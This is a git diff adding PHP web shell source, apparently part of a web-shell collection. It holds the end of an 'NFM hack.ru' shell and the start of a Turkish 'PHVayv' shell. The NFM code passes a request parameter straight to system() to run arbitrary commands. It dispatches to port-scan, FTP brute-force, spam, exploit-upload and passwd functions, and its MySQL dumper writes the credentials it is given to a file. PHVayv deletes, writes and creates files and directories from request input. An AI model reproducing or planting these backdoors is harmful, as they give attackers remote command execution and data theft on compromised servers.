+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/php/PH Vayv.php b/php/PH Vayv.php
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/php/PH Vayv.php	
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
